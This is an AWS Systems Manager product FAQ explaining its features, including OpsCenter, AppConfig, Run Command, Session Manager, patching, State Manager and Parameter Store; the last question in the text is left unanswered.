Q: What is AWS Systems Manager?
AWS Systems Manager allows you to centralize operational data from multiple AWS services and automate tasks across your AWS resources. You can create logical groups of resources such as applications, different layers of an application stack, or production versus development environments. With Systems Manager, you can select a resource group and view its recent API activity, resource configuration changes, related notifications, operational alerts, software inventory, and patch compliance status. You can also take action on each resource group depending on your operational needs. Systems Manager provides a central place to view and manage your AWS resources, so you can have complete visibility and control over your operations.
Q: Who should use AWS Systems Manager?
If you use multiple AWS services, AWS Systems Manager provides you with a centralized and consistent way to gather operational insights and carry out routine management tasks. You can use AWS Systems Manager to perform routine operations, track your development, test, and production environments, and proactively act on events or other operational incidents. AWS Systems Manager provides an operations complement to the more developer-focused tools you use, such as code editors and integrated development environments (IDEs). Similar to an IDE, AWS Systems Manager integrates a broad range of operations tools.
Q: How do I get started?
Getting started with AWS Systems Manager is easy. Using the AWS Management Console, navigate to the AWS Systems Manager console. You can create a resource group by using a simple tag query, then begin exploring the integrated set of operational tools that AWS Systems Manager provides.
Q: Can I privately access AWS Systems Manager APIs from my VPC without using public IP addresses?
Yes, you can privately access AWS Systems Manager APIs from your VPC (created using Amazon Virtual Private Cloud) by creating VPC Endpoints. With VPC Endpoints, the routing between the VPC and AWS Systems Manager is handled by the AWS network without the need for an internet gateway, NAT gateway, or VPN connection. The latest generation of VPC Endpoints used by AWS Systems Manager are powered by AWS PrivateLink, a technology that enables private connectivity between AWS services using Elastic Network Interfaces (ENIs) with private IP addresses in your VPCs. To learn more about PrivateLink, visit the PrivateLink documentation.
Q: Can I still use Amazon EC2 Systems Manager through the EC2 console?
Yes. Users who are accustomed to using EC2 Systems Manager in the EC2 console will find a link to AWS Systems Manager. Amazon EC2 Systems Manager services are still easy to discover and use. AWS Systems Manager offers a new user experience for these tools.
Q: What sorts of insights can I gather through AWS Systems Manager?
AWS Systems Manager overlays information from multiple AWS services. These cross-service insights are surfaced through multiple native dashboards. AWS Systems Manager also embeds Amazon CloudWatch dashboards and lets you reuse your existing dashboards or build new ones.
Q: What are built-in insights?
AWS Systems Manager’s built-in insights are dashboards that include recent API calls through AWS CloudTrail, recent configuration changes through AWS Config, Instance software inventory listings, instance patch compliance views, and instance configuration compliance views. You can filter these account-level insights to reflect the members of a particular resource group. These dashboards also show recent event logs through AWS Personal Health Dashboard and optimization recommendations through AWS Trusted Advisor.
Q: What is a managed instance?
A managed instance is any on-premises server or Amazon EC2 instance that can be managed using AWS Systems Manager. A managed instance can be a physical server or virtual machine in your on-premises data center or even another cloud provider.
Q: How do I set up a managed instance?
You can set up an EC2 instance as a managed instance by installing the Systems Manager agent and attaching an AWS Identity and Access Management (IAM) instance profile to the instance, which gives Systems Manager permission to perform actions on your instance. To register servers or virtual machines outside of Amazon EC2, you can create an activation.
Q: Do some operating systems already include the Systems Manager agent?
The Systems Manager agent is installed by default on the AWS Windows AMIs, on the Amazon Linux AMI, and available on the Amazon Linux repo. You can also install the agent on other supported operating systems.
Q: What are AWS Systems Manager activations?
AWS Systems Manager activations enable hybrid and cross-cloud management. Using AWS Systems Manager activations, you can easily register any server, whether physical or virtual to be managed by AWS Systems Manager.
Q: How do I register an instance using AWS Systems Manager activation?
You can create an AWS Systems Manager activation from the AWS Systems Manager console or API, which gives you an activation code and ID. Using this activation code and ID, you can run a command on your servers to register them to Systems Manager.
Q: What are standard and advanced on-premises instance management?
You can set your on-premises instance account level settings to either standard or advanced. With standard on-premises instance management, you will be able to register up to 1,000 on-premises instances per account per Region. If you need to register more than 1,000 on-premises instances, you can change your account level setting for on-premises instances to “advanced.” This will convert all the existing instances in the account and Region from standard to advanced management. With advanced on-premises instance management, you will also be able to use Systems Manager Session Manager to interactively access your on-premises instances. Note: Having a mix of instances within an account and Region is not supported.
Q: What is an AWS Systems Manager document?
An AWS Systems Manager document enables configuration as code to manage resources at scale. An AWS Systems Manager document defines a series of actions that allows you to remotely manage instances, ensure desired state, and automate operations. An AWS Systems Manager document is cross-platform and can be used for Windows and Linux instances.
Q: Where can I use AWS Systems Manager documents?
You can use Systems Manager documents with run command, state manager, or automation features.
Q: Are there pre-defined AWS Systems Manager documents?
Yes. You can choose from a variety of pre-defined AWS Systems Manager documents that automate common tasks including collecting inventory, installing applications, joining instances to a domain, instance operations, collecting metrics, and more.
Q: How do I create my own AWS Systems Manager document?
You can author AWS Systems Manager documents in JSON or YAML to match the defined document schema, from the AWS Systems Manager console or the APIs.
Q: What does the AWS Systems Manager SLA guarantee?
Our AWS Systems Manager SLA guarantees a Monthly Uptime Percentage of at least 99.9% for AWS Systems Manager priced features.
Q: How do I know if I qualify for a SLA Service Credit?
You are eligible for a SLA credit for AWS Systems Manager under the AWS Systems Manager SLA if an AWS Systems Manager priced feature has a Monthly Uptime Percentage of less than 99.9% during any monthly billing cycle.
For full details on all of the terms and conditions of the SLA, as well as details on how to submit a claim, please see the AWS Systems Manager SLA details page.
Q: Can I connect my ServiceNow and Jira Service Desk instances to AWS Systems Manager?
Yes. The AWS Service Management Connector for ServiceNow and Jira Service Desk (formerly the AWS Service Catalog Connector) allows ServiceNow and Jira Service Desk end-users to manage and operate AWS resources natively via ServiceNow. ServiceNow and Jira Service Desk users can execute automation playbooks using AWS Systems Manager seamlessly on ServiceNow and Jira Service Desk with the AWS Service Management Connector. This simplifies AWS product request actions for ServiceNow and Jira Service Desk users and provides governance and oversight over AWS products.
The AWS Service Management Connector for ServiceNow is available at no charge in the ServiceNow Store. This new feature is generally available in all AWS Regions where AWS Service Catalog is available. For more information, please visit the documentation.
The AWS Service Management Connector for Jira Service Desk is available at no charge in the Atlassian Marketplace. This new feature is generally available in all AWS Regions where AWS Service Catalog, For more information, please visit the documentation.
Q: What is AWS Systems Manager OpsCenter?
OpsCenter is a Systems Manager capability that provides a central location where operations engineers, IT professionals, and others can view, investigate, and resolve operational issues related to their environment. OpsCenter is designed to reduce mean time to resolution for impacted AWS and hybrid cloud resources. OpsCenter aggregates and standardizes operational issues, referred to as OpsItems, while providing contextually relevant data that helps with diagnosis and remediation. Information includes Config changes, AWS CloudTrail logs, resource description, AWS CloudWatch alarms, related OpsItems, and related resources. You can use our public APIs to create OpsItems from any source or use OpsItems integrated with Amazon CloudWatch Events. This means you can configure CloudWatch to automatically create OpsItems for any AWS service that publishes events to CloudWatch Events.
You can create the following types of OpsItems leveraging manual or automated configurations:
- Resource failures, such as an Amazon EC2 Auto Scaling group failure to launch an instance or a Systems Manager Automation execution failure
- Resource performance issues, such as a throttling event for Amazon DynamoDB or degraded Amazon EBS volume performance
- Health alerts from various AWS services, such as scheduled maintenance for an RDS DB instance or EC2 instance
- AWS Security Hub security alerts
- Resource state changes, such as an Amazon EC2 instance state change from running to stopped
- Or any other work item that needs someone’s attention
Q: What is an OpsItem?
An Opsitem is an AWS resource-related operational event which needs a user’s attention, and potentially, an investigation and resolution. It could be a resource-related failure, a maintenance notification, security alert, or a performance issue. An Opsitem includes relevant information that aids with investigation and resolution of the underlying event, such as impacted resources, similar past events, and recommended runbooks. High EC2 instance CPU utilization, CodeDeploy Deployment Failed, or EC2 Automation Execution failed are some examples of common OpsItems.
Q: What are the benefits of using OpsCenter?
OpsCenter enables users to reduce their mean time to resolution (MTTR) for operational issues, in some cases by over 50%. OpsCenter enables standardization and aggregation of operational issues (aka OpsItems) across various resources in a single place. Additionally, it brings together contextual information and operational tooling required to investigate and remediate issues. This reduces the time it takes engineers to navigate different tools to get relevant information. Working from a single location also minimizes the chances of manual errors, and reduces training time for newly hired engineers.
Q: Who should use OpsCenter?
Medium to large enterprises, who use multiple AWS services for their infrastructure needs, can leverage OpsCenter to manage their day-to-day operations. Additionally, Managed Service Provider (MSP) partners can also leverage OpsCenter as they manage infrastructure on behalf of other AWS customers. MSP customers can have a read-only role for better transparency into the MSP’s day-to-day operations.
Primary users of the service will be operations engineers, such as DevOps engineers and IT service desk professionals.
Q: How is OpsCenter different from a Case Management system?
OpsCenter is designed to complement your existing case management systems. You can integrate OpsCenter into your existing case management system by using public API actions. You can also maintain manual lifecycle workflows in your current systems and use OpsCenter as an investigation and remediation hub.
Q: Does OpsCenter require the use of the AWS Systems Manager Agent?
Getting started with OpsCenter doesn’t require the use of the Systems Manager Agent.
Q: What is AWS Systems Manager Explorer?
AWS Systems Manager Explorer is a customizable operations dashboard for your AWS resources. Explorer displays an aggregated view of operations data from across your AWS accounts and Regions. Explorer provides context into how operational issues are distributed across your business units or applications, how they trend over time, and how they vary by category.
Q: What is OpsData?
OpsData is operations data displayed by the Explorer dashboard. OpsData comes from a variety of sources including EC2, OpsCenter, and Patch Manager. You can view and manage OpsData sources from the Explorer settings page.
Q: How does Explorer relate to OpsCenter?
One type of data displayed by Explorer are OpsItems from OpsCenter. OpsItems help you manage, investigate, and remediate operational issues. Explorer provides an aggregated view of your OpsItems alongside other relevant operations data across accounts and Regions. OpsItems can still managed and remediated through OpsCenter.
Q: How do I view my OpsData across accounts and Regions?
You can view your OpsData across accounts and Regions by setting up a resource data sync from the Explorer settings page. The resource data sync collects all OpsData from the accounts and Regions you have specified and aggregate them into a single view.
Q: What is the relationship between AWS Systems Manager and AWS Resource Groups?
The AWS Systems Manager console integrates with AWS Resource Groups, and it offers grouping capabilities in addition to other native integrations.
Q: Can I create resource groups through AWS Systems Manager?
You can use the AWS Systems Manager console to create your own heterogeneous resource groups by using a tag query. This query will contain all of the AWS resources that are tagged that match a particular tag query. By creating your own resource groups, you can produce AWS Systems Manager views that reflect how you think about your resources. For instance, you might want to create resource groups by application component, application tier, or areas of operational ownership.
Q: What are resource group insights in AWS Systems Manager?
AWS Systems Manager offers a collection of resource-group-specific insights. These insights include recent API calls through AWS CloudTrail, recent configuration changes through AWS Config, instance software inventory listings, instance patch compliance views, and instance configuration compliance views. You can filter these account level insights to reflect the members of a particular resource group.
Q: What are resource group actions in AWS Systems Manager?
AWS Systems Manager lets you execute AWS Systems Manager automation documents directly on a resource group. The members of the resource group itself will be passed to the AWS Systems Manager automation document as an input. AWS Systems Manager automation documents offer a variety of example actions, such as restarting instances in a resource group after approval or patching Amazon EC2 instances, three at a time.
Q: What is AWS AppConfig?
AWS AppConfig is a feature of AWS Systems Manager that allows you to quickly validate and roll out configurations across an application of any size, whether hosted on Amazon Elastic Compute Cloud (Amazon EC2) instances, containers, AWS Lambda functions, mobile apps, or IoT devices, in a controlled and monitored way. AWS AppConfig enables you to validate configuration data to make sure it is syntactically and semantically correct according to your definitions before deploying it to your application. AWS AppConfig allows you to follow deployment best practices by rolling out configuration at a pace that you define while monitoring for errors. In case of errors, AWS AppConfig can roll back the changes to minimize impact to the application’s users.
Q: Who should use AWS AppConfig?
AWS AppConfig is designed for System administrators, DevOps teams, and developers who want to roll out configuration changes across their applications in a managed and monitored way, similar to the way they manage code, but without the need for deploying code when a configuration value changes, thus helping to mitigate the risk of outages. AWS AppConfig is for any size or type of company or organization that has targets (hosts, servers, AWS Lambda functions, containers, mobile devices, IoT devices, etc.) for configurations.
Q: What is a Configuration?
A Configuration is a collection of one or more application settings that your application uses to modify its behavior at runtime. You can store your configurations as AWS Systems Manager Documents or Parameters.
Q: What is a Validator?
A validator is either a schema or a pointer to an AWS Lambda function that AWS AppConfig uses to enable you to test that your configuration is syntactically or semantically correct according to your definitions.
Q: What is a Deployment Strategy?
A Deployment Strategy is a plan for how configuration data propagates to an application. A Deployment Strategy includes controls for defining the speed at which a configuration rolls out, the percentage of application instances that should receive updated configuration at various intervals, and the amount of time AWS AppConfig should monitor the overall application to help you ensure the configuration changes did not introduce an adverse effect.
Q: How is AWS AppConfig different from AWS CodeDeploy?
An application configuration is data that influences the behavior of an application and does not require compilation; configuration is an abstraction that can change at runtime. For example, we can control a feature release by populating a configuration value to a specific date and time. If the value needs to change, say to a new date and time, an administrator can change the configuration value, with no compiling required, and the application applies the new configuration at runtime. Both application configuration and code should include safety mechanisms to prevent errors in a production environment. We recommend that you use AWS AppConfig to apply safety mechanisms when deploying new configurations and AWS CodeDeploy when deploying new code.
Q: When should I use AWS Systems Manager Parameter Store and when should I use AWS AppConfig?
AWS Systems Manager Parameter Store is a feature that offers the ability to store, retrieve and manage a secret or plain-text configuration value. Common use cases for Parameter Store include storing database strings and license codes as parameter values. If you need to store and retrieve values in a self-managed way, you should use Parameter Store. AWS AppConfig is an application configuration management service which allows you to safely release updated configuration to applications at runtime and allows you to store configurations as Parameters. If you need to model a complex set of application configurations that you can validate and deploy safely in a controlled environment, with ability to rollback changes under certain conditions, you should use AWS AppConfig.
Q: How is AWS AppConfig different from AWS Config?
AWS Config enables you to assess, audit, and evaluate the configurations of your AWS resources while AWS AppConfig lets you manage application configuration. You should use AWS Config to get a detailed view of the configuration of AWS resources in your account and identify how the resources were configured in the past and how the configurations change over time. AWS AppConfig is meant for your applications running on AWS resources or premises servers. With AWS AppConfig, you can validate changes in application configuration and set deployment strategies to safely deploy updated configurations to applications at run-time.
Q: What are Amazon CloudWatch Dashboards?
With Amazon CloudWatch Dashboards, you can create reusable dashboards that allow you to monitor your AWS resources in one location. Metric data is kept for a period of fifteen months enabling you to view up-to-the-minute data and also historical data.
Q: How are Amazon CloudWatch Dashboards integrated with AWS Systems Manager?
Your existing CloudWatch Dashboards are now available directly through AWS Systems Manager. You can also create new CloudWatch Dashboards directly from Systems Manager. Using CloudWatch Dashboards, you can build your own custom operational dashboards to reflect the health of an application component, an application tier, or general areas of operational ownership.
Q: What is AWS Systems Manager inventory?
AWS Systems Manager collects information about your instances and the software installed on them, helping you to understand your system configurations and installed applications. You can collect data about applications, files, network configurations, Windows services, registries, server roles, updates, and any other system properties. The gathered data enables you to manage application assets, track licenses, monitor file integrity, discover applications not installed by a traditional installer, and more.
Q: Can I collect customized information from an Amazon EC2 instance or an on-premises instance?
Yes, you can create custom inventory types to collect additional system properties, which can be gathered by the instance itself or recorded using the API. Some examples include JSON-formatted results from PowerShell or other applications, and information statically stored in JSON files such as rack-info.
Q: How can I track changes to my configuration over time?
Using AWS Config, you can monitor an instance's compliance with a desired configuration through AWS Config rules. This capability allows security experts and compliance auditors to have a complete audit trail of instance configuration changes, as well as receive proactive notifications in the event of non-compliance.
Q: Can I view or query inventory data from across AWS accounts or Regions?
Yes, you can sync inventory data from multiple accounts and Regions to the same Amazon S3 bucket. You can then use Amazon Athena, Amazon QuickSight, or your own business intelligence (BI) tools to query inventory data across accounts and Regions.
Q: What is AWS Systems Manager configuration compliance?
AWS Systems Manager lets you scan your managed instances for patch compliance and configuration inconsistencies. You can collect and aggregate data from multiple AWS accounts and Regions, and then drill down into specific resources that aren’t compliant. By default, AWS Systems Manager displays data about patching and associations. You can also customize the service and create your own compliance types based on your requirements.
Q: Can I track changes to my configuration over time?
Using an integration with AWS Config, you can monitor an instance's compliance with a desired configuration through AWS Config rules. This capability allows security experts and compliance auditors to have a complete audit trail of instance configuration changes, as well as receive proactive notifications in the event of non-compliance.
Q: How do I view the compliance levels of my instances?
With AWS Systems Manager you can view patch compliance information, which tells you the detailed results of the patching process. You can easily get aggregate compliance details per instance. In addition, you can drill in further and for each instance you can determine which patches are installed, missing, not applicable, and which failed to install.
Q: Can I create my own compliance checks?
Yes. You can create your own compliance types that can be recorded through the API. Based on your business requirements, you can create your own checks and then record the compliance through AWS Systems Manager to track non-compliant instances. You can also view this compliance information across accounts and Regions by creating a resource data sync.
Q: What is AWS Systems Manager automation?
AWS Systems Manager allows you to safely automate common and repetitive IT operations and management tasks across AWS resources. With Systems Manager, you can create JSON documents that specify a specific list of tasks or use community published documents. These documents can be executed directly through the AWS Management Console, CLIs, and SDKs, scheduled in a maintenance window, or triggered based on changes to AWS resources through Amazon CloudWatch Events. You can track the execution of each step in the documents as well as require approvals for each step. You can also incrementally roll out changes and automatically halt when errors occur.
Q: What tasks can I automate?
You can automate any task that involves interaction with AWS and on-premises resources. Built-in action types let you easily interact with Amazon EC2 instances, AWS CloudFormation stacks, and more. Action types are available to invoke AWS Systems Manager run command, Python and PowerShell scripts, and AWS Lambda functions.
Q: Are there predefined AWS Systems Manager automation playbooks?
There are over 75+ predefined AWS Systems Manager automation playbooks that you can click and execute to accomplish a wide range of tasks such as baking golden AMIs, patching Amazon EC2 instances, managing instance states, and more.
Q: Can I create my own AWS Systems Manager automation playbooks?
You can customize existing AWS Systems Manager automation playbooks or create your own using JSON or YAML. You can also use AWS Systems Manager automation playbooks shared by another account and share your playbook with others. You can use the builder experience from the console to create your playbook. With this builder, you can focus on defining the business logic of your playbooks without having to worry about the domain specific language in Yaml/ JSON syntax. You can leverage the builder choose from the library of actions and add inputs and outputs to create your playbook.
Q: Can AWS Systems Manager automation help with the approval process?
Yes. Built-in approval action types can be included in your AWS Systems Manager automation playbooks. The approver can be one or more AWS Identity and Access Management (IAM) users. AWS Systems Manager automation playbook execution will wait until the minimum number of required approvals are received or denied and proceed appropriately.
Q: Can I execute AWS Systems Manager automation playbooks against an entire resource group?
Yes. You can target resource groups and execute AWS Systems Manager automation playbooks against specific resource types. You can also specify safety controls to indicate the number of resources in the group that should be simultaneously executed against, and you can add error thresholds that will stop AWS Systems Manager automation playbook execution.
Q: Can I execute AWS Systems Manager automation playbook steps one at a time?
Yes. You can choose to execute the entire AWS Systems Manager automation playbook at once or choose the manual execution mode to execute one step at a time.
Q: Can I trigger AWS Systems Manager automation playbook execution on a schedule or based on other events?
Yes. You can schedule AWS Systems Manager automation playbook execution to be triggered as an Amazon CloudWatch Events target, or you can use AWS Systems Manager maintenance windows or AWS Systems Manager state manager to trigger AWS Systems Manager automation playbook execution on a schedule. You can also trigger AWS Systems Manager automation playbook execution based on changes to AWS resources through Amazon CloudWatch Events.
Q: How does a user specify a script in an Automation playbook?
There are two methods by which you can execute a script in Automation. You can include script inline as a step in a playbook. Alternately, you can add scripts as attachments to a playbook and execute them by reference from a playbook step.
Q: Do Automation playbooks support multiple scripts?
Yes. You can attach multiple scripts to an Automation playbook and reference a script from a step. Scripts can be uploaded to playbook as files or folder. Script dependencies, i.e. scripts calling other scripts are also supported so long as the scripts are all part of the same playbook. Other artifacts required for the scripts to run such as CloudFormation or Serverless Application Model (SAM) templates can be attached to the playbooks.
Q: What script languages are supported by Automation for the script step? What environments are pre-loaded based on the script language?
At launch, PowerShell Core and Python3 will be supported by Automation. Environments preloaded are Python with Boto (preloaded with AWS APIs).
Q: What are the requirements of the script for a script step?
Automation supports inputs to be specified for a playbook. The parameters required by the scripts can be collected as Automation playbook input parameters, output from a previous step, or collected during runtime from other sources such as databases. Script output is available for consumption by the subsequent steps as a JSON object. Existing Automation features like referencing step output, Automation variables, Systems Manager Parameter Store parameters can be used to pass outputs for consumption in the playbook.
Q: What is AWS Systems Manager run command?
AWS Systems Manager provides you safe, secure remote management of your instances at scale without logging into your servers, replacing the need for bastion hosts, SSH, or remote PowerShell. It provides a simple way of automating common administrative tasks across groups of instances such as registry edits, user management, and software and patch installations. Through integration with AWS Identity and Access Management (IAM), you can apply granular permissions to control the actions users can perform on instances. All actions taken with Systems Manager are recorded by AWS CloudTrail, allowing you to audit changes throughout your environment.
Q: Does AWS provide any predefined commands?
Yes. There are predefined commands available which are designed to help with commonly used administrative tasks. For Windows you can run a PowerShell or Shell command or script, configure Windows Update settings, and deploy an MSI application and more. For Linux you run any Shell command or script, and remotely update an installed agent. You can also create custom commands to perform common tasks required for your environment.
Q: Can I make bulk changes across my environments?
Yes. You can act against large groups of instances by targeting using tag based queries. You can propagate changes safely across your environments by setting up rate control, which allows you to specify simultaneous execution batches with error thresholds.
Q: Can I control who can execute a command?
Yes. Using the published AWS Identity and Access Management (IAM) permissions and policies, you can use tag-based permissions to control who has access to execute commands or documents on specific instances. For example, you can specify an IAM user who can run PowerShell commands, but not join an instance to a domain. Another IAM user can only be given access to run a very specific command, like restarting services, giving you the flexibility to specify how much access any given user can have.
Q: What is Session Manager?
Session Manager is a fully-managed service that provides you with an interactive browser-based shell and CLI experience. It helps provide secure and auditable instance management without the need to open inbound ports, maintain bastion hosts, and manage SSH keys. Session Manager helps to enable compliance with corporate policies that require controlled access to instances, increase security and auditability of instance access, while providing the simplicity and cross-platform instance access to end users.
Q: What are the benefits of using Session Manager?
Session Manager improves your security posture by not requiring you to open inbound ports, or to maintain SSH keys or certificates on your instances. It also centralizes access to instances using AWS Identity and Access Management (IAM). Once you enable Session Manager, you can connect to any Linux or Windows EC2 instance and track each user who started a session on each instance. You can audit which user accessed an instance and when using AWS CloudTrail, and log every command executed on an instance to Amazon S3 or Amazon CloudWatch Logs. Finally, with Session Manager you don’t need up-front investments to operate and maintain bastion hosts.
Q: Who should use Session Manager?
Any AWS customer who wants to improve their security and audit posture, reduce operational overhead by centralizing access control on instances, and reduce inbound instance access will benefit from Session Manager. Information Security experts who want to monitor and track instance access and activity, and close down inbound ports on instances, or enable connecting to instances without a public IP will benefit from Session Manager. Administrators who want to grant and revoke access from a single place and want to provide one solution for Windows and Linux instances to users will benefit as well. Finally, operators can get started quickly by using the browser to click to start a session and then selecting an instance, or use the CLI, without having to provide SSH keys.
Q: What features are offered by Session Manager?
You can start a session to a Linux or Windows EC2 instance from the AWS Management Console, AWS CLI or any other AWS SDKs. You can grant and revoke user access to instances using tag-based permissions from AWS IAM, and then you can audit who started or ended a session using AWS CloudTrail. All actions performed on an instance can be logged to Amazon S3 or Amazon CloudWatch Logs for later analysis.
Q: How much does Session Manager cost?
Session Manager is available at no additional cost to manage Amazon EC2 instances.
Q: What is AWS Systems Manager patch manager?
AWS Systems Manager helps you select and deploy operating system and software patches automatically across large groups of Amazon EC2 or on-premises instances. Through patch baselines, you can set rules to auto-approve select categories of patches to be installed, such as operating system or high severity patches, and you can specify a list of patches that override these rules and are automatically approved or rejected. You can also schedule maintenance windows for your patches so that they are only applied during preset times. Systems Manager helps ensure that your software is up-to-date and meets your compliance policies.
Q: How do I specify when I want to patch an instance?
You can use an AWS Systems Manager maintenance window to define when patching occurs. AWS Systems Manager provides you the ability to define one or more recurring windows of time during which it is acceptable for your own maintenance to occur. By defining these windows and associating your instances with them, it is easier for you to ensure that any maintenance activities you perform on your instances which may affect the availability of a workload is done so during a well-defined window of time.
Q: How do I customize the patching process?
AWS Systems Manager provides a fully automated patching process. You can easily customize the patching process by writing your own AWS Systems Manager command or automation document.
Q: How do I pick the patches I want to install?
Patch baselines define the set of patches you have approved or blocked for deployment to your instances. In a patch baseline, you can select patches by the products (e.g., Windows Server 2008, Windows Server 2012, etc.), categories (e.g., critical updates, security updates, etc.), and severities for which you want to review patches for deployment. For each category selected, you can then define a schedule on which the contained patches will be automatically approved for deployment. In addition to the rules, you can also specify a whitelist and blacklist of patches that indicate patches that are to be installed or blocked respectively. At the time of patching, AWS Systems Manager will assess targeted instances for only the patches that have been approved prior to that point in time.
Q: How do I view the compliance levels of my instances?
You can view patch compliance information, which tells you the detailed results of the patching process. From the AWS Systems Manger console or APIs, you can easily get aggregate compliance details per instance. In addition, you drill in further and for each instance you can determine which patches are installed, missing, not applicable, and which failed to install.
Q: What is an AWS Systems Manager maintenance window?
AWS Systems Manager lets you schedule windows of time to run administrative and maintenance tasks across your instances. This ensures that you can select a convenient and safe time to install patches and updates or make other configuration changes, improving the availability and reliability of your services and applications.
Q: Why should I use AWS Systems Manager maintenance windows?
AWS Systems Manager maintenance windows help improve availability and reliability of your workloads by automatically performing tasks in a well-defined window of time, significantly reducing the impact of any operational or infrastructure failures.
Q: What tasks can I perform using an AWS Systems Manager maintenance window?
You can perform tasks like the following:
- Installing applications, updating patches, installing or updating AWS Systems Manager agents, or executing PowerShell commands and Linux shell scripts.
- Building Amazon Machine Images (AMIs), boot-strapping software, and configuring instances.
- Executing AWS Lambda functions that trigger additional actions such as scanning your instances for patch updates.
- Running AWS Step Function state machines to perform tasks such as removing an instance from an Elastic Load Balancing environment, patching the instance, and then adding the instance back to the Elastic Load Balancing environment.
Q: What are the types of schedules I can choose for my AWS Systems Manager maintenance windows?
AWS Systems Manager maintenance windows can be scheduled for a recurring date (e.g., weekly on Tuesdays at 22:00:00 or first Sunday of every month at 22:00:00). You can define your schedule using cron or rate expression.
Q: What is AWS Systems Manager Distributor?
Distributor is an AWS Systems Manager feature that enables you to securely store and distribute software packages in your organization. You can use Distributor with existing Systems Manager features like Run Command and State Manager to control the lifecycle of the packages running on your instances.
Q: What are the benefits of using Distributor?
Distributor helps you scale software package rollouts by enabling standardization of package distribution. By using Distributor with AWS Systems Manager Run Command and State Manager, you eliminate the need to build and maintain your own package distribution and installation tooling. Distributor also simplifies software package management by using a centralized repository for all of your packages. Distributor supports the use of IAM policies, providing full control over who can create and update packages. Distributor also helps enable secure software package distribution, because your packages are encrypted in storage and all communication between Distributor and your instance is signed and encrypted.
Q: Who should use Distributor?
Any AWS customer who regularly distributes software packages and wants a secure way to scale package management, a centralized repository for packages, or to eliminate the need for self-maintained distribution tooling should use Distributor. IT professionals who want to control who can create or update software packages and which versions are distributed to each AWS account will benefit from Distributor.
Q: Does Distributor require the use of the SSM Agent?
Yes. Getting started with Distributor requires the use of the latest version of the SSM Agent. The SSM Agent is open-sourced and available on GitHub. The SSM Agent is also installed by default on Amazon Linux, Amazon Linux 2, Windows, and Ubuntu AMIs.
Q: What is AWS Systems Manager state manager?
AWS Systems Manager provides configuration management, which helps you maintain consistent configuration of your Amazon EC2 or on-premises instances. With Systems Manager, you can control configuration details such as server configurations, anti-virus definitions, firewall settings, and more. You can define configuration policies for your servers through the AWS Management Console or use existing scripts, PowerShell modules, or Ansible playbooks directly from GitHub or Amazon S3 buckets. Systems Manager automatically applies your configurations across your instances at a time and frequency that you define. You can query Systems Manager at any time to view the status of your instance configurations, giving you on-demand visibility into your compliance status.
Q: Why should I use AWS Systems Manager state manager?
Ensuring that the infrastructure that is powering your applications is consistent is a challenge. AWS Systems Manager allows you to create policies, reapply these policies to prevent configuration drift, and monitor the status of your intended state.
Q: How do I create my policies?
Policies can be easily created through AWS Systems Manager documents. In addition, you also have predefined configurations that you can use for installing applications, joining instances to domain and so on.
Q: What are the targets that can be configured?
You have the flexibility to target instances or tags. This means you have the flexibility to have specific configurations for groups of instances such as web servers.
Q: Can I use my existing configuration management tools with AWS Systems Manager state manager?
Yes. AWS provides pre-defined AWS Systems Manager documents to run Ansible playbooks or Salt States, and you can use PowerShell DSC on your instances using AWS Systems Manager state manager to mitigate configuration drift. In addition, you can also directly run any configuration scripts from your public or private GitHub repository.
Q: What is AWS Systems Manager parameter store?
AWS Systems Manager provides a centralized store to manage your configuration data, whether plain-text data such as database strings or secrets such as passwords. This allows you to separate your secrets and configuration data from your code. Parameters can be tagged and organized into hierarchies, helping you manage parameters more easily. For example, you can use the same parameter name, "db-string", with a different hierarchical path, "dev/db-string” or “prod/db-string", to store different values. Systems Manager is integrated with AWS Key Management Service (KMS), allowing you to automatically encrypt the data you store. You can also control user and resource access to parameters using AWS Identity and Access Management (IAM). Parameters can be referenced through other AWS services, such as Amazon Elastic Container Service, AWS Lambda, and AWS CloudFormation.
Q: Why should I use AWS Systems Manager parameter store?
It is a best practice to store configuration data and secrets separately from your code. You can use AWS Systems Manager parameter store to quickly store and reference configuration and sensitive information. Rather than storing data in config files or referencing them in plain text, you can store and obtain this information in your applications or scripts. Additionally, you control who has access to parameters so that only the right set of users has access to the appropriate information.
Q: How do you store sensitive data?
A secure string is any sensitive data that needs to be stored and referenced in a secure manner. If you have data that you do not want users to reference in clear text or have access to data that can be tampered with or misused, you should use secure strings in AWS Systems Manager parameter store. You can encrypt your sensitive data using your own AWS Key Management Service (KMS) key or your user account default key provided by AWS KMS.
Q: Can I track usage and provide access control to specific parameters?
Yes. You can provide granular access control through customized permissions to users and resources (such as instances) for parameters access using AWS Identity and Access Management (IAM). This means you can control who can access which parameter on what resource. You can also set up Amazon CloudWatch Events rules based on parameter change events. Additionally, you can also track and audit parameter API calls using AWS CloudTrail.
Q: Can I track changes to parameters?
Yes, you can see history of parameter changes. You can also use versions that are automatically incremented upon change to look up specific parameter value bases on its version.
Q: Can I store hierarchical data as parameters?
Yes, you can use a hierarchical structure to store parameters. You can also control and audit access at every level of the hierarchy.
Q: What is the difference between Secrets Manager and Parameter Store?
AWS Secrets Manager is a service to manage the lifecycle for the secrets used in your organization centrally including rotation, audit, and access control. Secrets Manager helps you meet your security and compliance requirements by enabling you to rotate secrets automatically. Secrets Manager offers built-in integration for MySQL, PostgreSQL, and Amazon Aurora on Amazon RDS that's extensible to other types of secrets by customizing Lambda functions.
AWS Systems Manager Parameter Store provides secure, hierarchical storage for configuration data management, which can include secrets. Data such as database connection strings, passwords, and license codes can be stored as parameter values and can be audited and access controlled. Values stored can be either plain text or encrypted data. You can then reference values by using the unique name of the parameter. You can reference Systems Manager parameters to build generic configuration and automation scripts for use across AWS services such as Amazon ECS and AWS CloudFormation.
Q: Should I use Parameter Store or Secrets Manager?
If you want a single store for configuration and secrets, you can use Parameter Store. If you want a dedicated secrets store with lifecycle management, use Secrets Manager. Parameter Store is available at no additional charge with limit of 10,000 parameters. Refer to secrets manager pricing page for pricing details.
Q: Is there a difference in the security model of Parameter Store and Secrets Manager?
No. Both Secrets Manager and Parameter Store are equally secure. Both services support encryption at rest using customer-owned KMS keys. For more information on how Parameter Store uses KMS, please see the KMS Developer Guide on how Parameter Store uses AWS KMS.
Q: Can I use Secrets Manager with Parameter Store?
Yes. You can reference a Secrets Manager secret with Parameter Store.
Q: What are advanced parameters?
Advanced parameters provide enhanced capabilities such as the ability to store more than 10,000 parameters, larger parameter value size (up to 8 KB) and parameter policies such as expiration and no-change notifications. The expiration policy provides the ability to specify an expiration date and time. The no-change notification policy helps you track parameters that have not changed for a specified period of time. Advanced parameters are priced for storage per month and per API interaction. See the pricing page for details.
Q: Can I convert between standard and advanced parameter types?
